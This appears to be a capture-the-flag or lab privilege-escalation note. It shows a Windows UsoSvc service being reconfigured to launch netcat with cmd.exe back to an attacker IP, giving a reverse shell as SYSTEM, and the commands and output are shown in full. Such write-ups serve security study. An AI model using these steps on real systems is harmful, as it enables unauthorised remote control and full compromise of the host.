8 privesc_2 UsoSvc

# PEAS shows we have all access to UsoSvc
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#example-with-windows-10---cve-2019-1322-usosvc

C:\inetpub\new-site>sc stop UsoSvc
sc stop UsoSvc

SERVICE_NAME: UsoSvc
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 3  STOP_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x6
        WAIT_HINT          : 0x7530

C:\inetpub\new-site>sc query UsoSvc
sc query UsoSvc

SERVICE_NAME: UsoSvc
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\inetpub\new-site>sc.exe config UsoSvc binpath= "C:\Users\public\nc.exe 10.10.16.7 9090 -e cmd.exe"
sc.exe config UsoSvc binpath= "C:\Users\public\nc.exe 10.10.16.7 9090 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS

C:\inetpub\new-site>sc.exe qc usosvc
sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usosvc
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START  (DELAYED)
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\public\nc.exe 10.10.16.7 9090 -e cmd.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Update Orchestrator Service
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem
C:\inetpub\new-site>sc start UsoSvc

$ nc -lvnp 9090
listening on [any] 9090 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.97] 53623
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

Last updated